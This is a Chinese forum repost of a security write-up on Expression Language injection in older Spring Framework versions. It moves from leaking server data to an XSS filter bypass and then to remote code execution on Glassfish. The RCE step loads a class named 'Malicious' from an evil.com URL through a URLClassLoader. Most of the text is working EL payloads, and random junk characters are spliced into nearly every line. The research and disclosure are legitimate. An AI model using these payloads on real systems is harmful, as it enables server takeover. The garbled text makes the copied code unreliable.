Remote Code with
% f) u9 E* f4 u( y5 q5 N y- PExpression Language Injection$ k1 {9 C) l" M& {! E' t4 ?: S* Z
Spring Framework脆弱性—DanAmodio; X! `5 U( z7 J# y
全世界超过22,000组织已经下载了131.4万过时的Spring Framework,使用在业务中
$ m. ^; a4 y8 N. w$ M: f; e( ~& A* e$ n! U可能会存在风险。5 c: T& k2 N- L$ Y6 T0 y
在2011年,来自Minded Security 的Stefano Di Paola 和来自Aspect Security的* }' x9 B5 j& D
Arshan Dabirsiaghi 在Spring Framework中发现了一个有趣模式。Stefano创造了Expression Language (EL) 注入。他们的发现披露了某些双重的解析EL 的spring 标签可
. h8 S; d1 J, ?以泄露服务器上的敏感数据。这是由于spring 提供了独立于jsp/servlet容器的EL支持,+ c; w. G3 r8 y" r) K
以此来作为向下兼容的一种方式。因此在jsp2.0之前,EL 是不被支持的。这个功能在当前
" |9 Z; R; q" {1 g2 F) ]版本中是默认打开的,应用程序使用了此模式描述是易受攻击的。$ Z% a* h2 H2 x& ]6 t6 E7 P+ j
由于每个应用程序并不都会出现反射xss这种弱点,虽然很难量化它的深度和广度,但
) a2 k4 p; v* Y我们根据Sonatype最新的统计知道,全世界超过22,000的组织下载Spring 3.0.5以下版: T2 h9 U- X5 d1 U4 I4 i
本已经超过131.4 万。Point-in-fact, one large retail organization consumed 241 different artifacts, 4,119 total downloads。
' X9 W1 | ?9 l2 J4 z8 o6 m这些版本不支持禁用double EL resolution.6 v2 R8 d. i1 m, U1 Z5 g
这个问题原来的影响是信息泄露,但是我将举例说明它如何在Glassfish 和其他包含2 r" N! L0 ]7 J
EL2.2容器上可能进行远程代码执行。
! O7 ?! M3 A4 _8 W1 x; z这是一个原始信息泄露的攻击例子:
2 |0 ^9 G& K) G0 z. _3 `6 C6 ~5 I请求:2 u( [2 H; `) ?/ V3 {0 k5 @* f7 u
ttp://vulnerable.com/foo?message=${applicationScope}3 h- I& d: u( V" t) b
到达以下内容页面:
$ z8 W" r3 e7 }# H: ~3 H. ]结果将输出一些包含内部服务器信息calsspath 和本地工作目录0 U" F9 O+ ]" _, T/ o! y R" `
你也可以做一些其他事情,如这样:* _ o& T) e# ^
${9999+1}
$ e$ W- Y! W1 `7 I' w还可以访问session 对象和beans. @' y+ k: E" y
${employee.lastName}3 W( p! v( l5 q/ n1 q1 N; B2 j
在执行Glassfish上客户端应用程序的渗透测试时,我遇到了同样的模式,知道大概是
. O, F: A7 ]: x0 I: bEL 注入,做了额外的测试后,确认了这一发现,同时延续下去,我想挖掘一些有滋味的东# [( }4 _8 p+ m2 e2 w$ n" N# c
西,比如XSS.
2 E; X/ B1 l8 |; J/ j0 q哎,应用程序的输入过滤终止了我的请求,因此去掉了””标签
' O9 \; J3 c5 p' j2 z/ F突发奇想,我想“我可以在JAVA中进行字符操纵,为什么我不试试利用EL来绕过过滤
) O5 `4 F' [( @; A/ t呢?”
. b9 e+ G6 l6 D# F因此,我尝试巳缦拢�! Z P# z% g) D9 R a" x k# P& I
http://vulnerable.com/app?code=${param.foo.replaceAll(“P”,”Q”)}foo=PPPP2 X, h8 w4 l( h* M8 w% u
P; u: N1 J6 S& j1 Q4 a6 ^
我注意到返回的错误代码时QQQQQ,由于String.replaceall 方法已经被调用,所以返
8 s0 ~7 X" ]' ?, N7 b+ [$ P回的文本被插入进了spring:message 标签。
9 k( x1 @6 t+ d" t1 A0 X$ _. y这里是一个最终绕过过滤的实例:0 r/ m0 L/ \. M5 M
http://vulnerable.com/app?code=${param.foo.replaceAll(“P”,””)}&foo=PscriptQalert(1) /scriptQ& y& N( Q( ^ B5 G
它运行的很好,接下来一个小时我什么都没想。然后我认识到他是真的真的糟糕的。为) G, t. K- P" j& r j, o! h
什么可以在EL中像这样插入方法。接下来,我还可以做些其他好玩的事情呢?
; P p# t: |% K7 c/ V$ n! N经过一番研究,我学习到EL2.2 增加了方法调用。, }0 k' q: q: b
我写了一个快速测试应用程序代码并且检测一些功能
4 k% |7 B; _5 {; V7 O/ ~6 G* n; ~${pageContext.request.getSession().setAttribute(“account”,”123456″)}
7 j5 L- L7 N# Y2 h${pageContext.request.getSession().setAttribute(“admin”,true)}
2 ~% y+ x. Y6 }* l% E: d6 h- J! }好了,会话对象修改是一个明显的风险。我真的想接触到对象,但是我没有一个直接的
2 N$ o6 S; }1 r/ ^' q指向pageContext对象,也许我可以使用反射,像String.getClass().forName(string)?
5 M) [) m) q: {+ M${“”.getClass().forName(“java.net.Socket”).newInstance().connect(“127.0.0.1; ~! J0 s6 Q& M- ~
“, 1234)}# q b+ Q [4 H# h/ x% I
${“”.getClass().forName(“java.lang.Runtime”)}
9 E' m% A$ S8 i7 W4 s+ E, Q哇,没有方法让它工作,由于可以接触到任何东西这可是灾难性的。不幸的是,它是不2 S# F1 s; ?( @( x# G% B
可能调用newinstance()初始化许多危险类(如Runtime),由于它们没有提供默认的构造函
6 m& F9 {5 i z' v2 S" j, t6 i数,我们无法创建对象。当它请求null或者一个空数组,getMethods()[0].invoke()会有
7 r( o( I0 B, u! ~一些问题。在传递数据到方法之前,EL 似乎是理解它为一个字符串字面值。我猜测是由于 V |- W& r' z4 d
方法签名invoke(Object obj, Object„ args)
& k% j: J) V" { {* P, iJeff Williams (Aspect Security 和OWASP核心创始人) ,Arshan,和我都思考这个问
- Y! W6 U) g4 h' W- J$ l题,以让它可以工作起来。
3 c7 ]- L3 @3 j$ A漏洞利用:
9 h! M8 [# u7 z2 C" i* C我在墙上撞的我的脑袋bangbang响,我已经用尽了所有想法,现在我们公开这个,我5 `2 f2 T3 c N3 i
希望你们中的一些JAVA奇才告诉我我是如此的可笑。
! M2 e: R. P/ i5 D5 \* n这里有一些我试过的失败的用例,为了试图让它工作的用例:
% N) _$ e8 B3 Z, b) a 写文件到文件系统
8 g4 Z# b) _! ?6 S 试图载入org.springframework.expression.spel.standard.SpelExpressionParser.) }/ u4 g' [% Q( I
我认为这些可以很好的工作,但是我不能找到合适的类来载入。
1 U+ y+ q- @0 g7 z${pageContext.getClass().getClassLoader().loadClass(“org.springframework.expression.spel.standard.SpelExpressionParser”)}
3 P/ {& L$ l1 h3 O; @javax.servlet.jsp.el.ELException: java.lang.ClassNotFoundException:
2 k2 z0 j5 o' T: ] k! z. korg.springframework.expression.spel.standard.SpelExpressionParser not found# z: ]% y5 C) T- Z( B& k
by
, K+ Y, n+ l/ X | Aorg.glassfish.web.javax.servlet.jsp [194].3 ~! Q/ S& Q) E Q$ [6 ^! I; [
利用反射来修改java.lang.Runtime.currentRuntime的属性为Public4 q: K+ F: \1 x
利用反射来创建一个新的Runtime(and watch the world burn)' ?& R3 ~' s* q, e: e2 q6 S' I
${pageContext.request.getSession().setAttribute(“rtc”,”".getClass().forName
; D' @ @) R' f6 E- h% L; |(“java.lang.Runtime”)).getDeclaredConstructors()[0])}
; a, V4 x+ K/ w' ^3 p7 y${pageContext.request.getSession().getAttribute(“rtc”).setAccessible(true)}
; U8 A& |/ K; f0 S" c2 } 使用java.lang.ProcessBuilder' v0 w7 v( s! R; `9 Y
用表达式语言来评估表达式语言
' Z" T. ^* t% w4 C6 i6 }Expression-ception ! 在这点我想我快疯了,载体并没有任何实际意义.
7 L7 _1 _, r3 x9 U3 F; W${pageContext.getExpressionEvaluator().parseExpression(“pageContext.request9 O7 A* [0 b4 G6 [, A8 [5 T
“,”".getClass(),null)}
1 E- z6 Z, `8 e1 I# c0 Y1 J0 d 创建一个ObjectInputStream,序列化一个类并将其作为一个参数发送(也有点疯狂)
* R) C5 b- i1 f我在使用一个空数组通过Method.invoke()时失败了很多次
/ }$ b1 t# [. M$ T3 t“”.getClass().forName(“java.lang.Runtime”).getMethods()[5].invoke(param.foo: P+ y2 d# @' G5 c
.getClass().forName(“java.lang.Runtime”),”".getClass().forName(“java.util.A
* I$ O, l$ L4 _" {: arrayList”).newInstance().toArray()) a+ x. B! f0 g5 X
java.lang.IllegalArgumentException: wrong number of arguments- a' w( N3 \# w0 h
最后,有一天晚上我被绊倒在一个问题前:我能得到一个URLClassLoader,因此我可
; ]$ }8 o3 B3 P; w7 C以创建一个恶意class文件并且指向类装载器.) X1 a, U! b2 e4 S# n
我写了一个JAVA 类,它试图打开服务器上的计算器,来证明远程代码执行:
7 H) y( R, M2 X4 rpublic class Malicious {
6 n/ K4 \# K- k y' \# @ k" ~+ k+ Upublic Malicious() {
3 ^/ \4 e5 w0 F9 W2 n N3 t* Ztry {1 K* ]7 g4 k J3 O6 n
java.lang.Runtime.getRuntime().exec(“open -a Calculator”); //Mac
2 z3 S% J/ l# q. } F: F, ?9 t1 @( ]$ wjava.lang.Runtime.getRuntime().exec(“calc.exe”); //Win1 @. s; b3 _( x& R* F
} catch (Exception e) {% H& _; ~- A1 n& x4 r
}6 k# h0 r! M- c8 e% e2 b
}
# R* p# s7 Y/ d% ]) h我们创建了一个数组列表将被用于构造一个新的URLClassLoader,它需要被存储在回 Y( q5 ?# }4 y& D% F. \8 p! w
话中,因此它可以被使用.2 j* O n( h+ n2 m
${pageContext.request.getSession().setAttribute(“arr”,”".getClass().forName. F! ]6 y, O/ h% c
(“java.util.ArrayList”).newInstance())}
$ p) t$ U9 H8 U8 l' ] yURLClassLoader 提供了一个newInstance 方法,它接受URL对象数组。我们需要创建( ?1 q) w E* `9 U1 \3 I
一个新的包含我们恶意代码路径的URL。ServletContext可以提供给我们一个URL对象和
5 Q& V7 H* |0 H7 M3 ?getResource(string) 方法,但是我们不可能直接创建一个新的实例。然而URI提供了一个
1 a- m6 C, I' y/ z1 X我们可以调用的create(string)方法,然后转换对一个URL对象。
$ r( ^; {1 m& u3 p$ i/ x( ^5 }${pageContext.request.getSession().getAttribute(“arr”).add(pageContext.getServletContext().getResource(“/”).toURI().create(“http://evil.com/path/to/wh( J. R' z) y7 K6 N, p! i
ere/malicious/classfile/is/located/”).toURL())}
) _# O: T8 ~- N) P! ?- ?然后我们发现了一个到URLClassLoader指示器,因此newInstance 方法可以被调用,3 ?+ B& D; H0 D
恶意类文件被装载并创建,触发远程代码.
! U) g6 T# G- I" {. h${pageContext.getClass().getClassLoader().getParent().newInstance(pageConte4 W! c5 x& R$ g3 V( h! o$ p7 g
xt.request.getSession().getAttribute(“arr”).toArray(pageContext.getClass().; C9 H. _: Z2 M# ^
getClassLoader().getParent().getURLs())).loadClass(“Malicious”).newInstance
/ H+ A3 i3 z# i$ x()} |
发表于 2013-2-16 21:47:24
收藏
支持
反对